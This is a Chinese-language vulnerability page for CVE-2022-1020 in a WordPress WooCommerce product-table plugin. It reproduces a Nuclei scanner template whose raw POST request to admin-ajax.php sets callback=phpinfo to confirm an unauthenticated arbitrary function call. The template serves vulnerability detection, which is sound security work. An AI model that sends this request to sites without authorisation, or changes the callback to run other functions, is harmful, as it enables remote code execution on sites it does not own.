CVE-2022-1020: WordPress WooCommerce <3.1.2 - Arbitrary Function Call

日期: 2025-08-01 | 影响软件: WordPress WooCommerce | POC: 已公开

漏洞描述

WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.

PoC代码[已公开]

id: CVE-2022-1020

info:
  name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call
  author: Akincibor
  severity: critical
  description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
  impact: |
    It allows remote code execution on the affected system.
  remediation: |
    Update WordPress WooCommerce plugin to version 3.1.2 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1020
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1020
    cwe-id: CWE-352
    epss-score: 0.86706
    epss-percentile: 0.99387
    cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: codeastrology
    product: woo_product_table
    framework: wordpress
  tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,unauth,codeastrology

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_key=a&perpose=update&callback=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
        part: body
# digest: 4a0a004730450221008a3e01a23842170c2ac3ce92bf6c8924ddaf410019bca66b068de04fc749915402206677b925900493aac59bca849a50d560f99c82a4648b11a489cd400fc7ab7183:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1020.yaml

相关漏洞推荐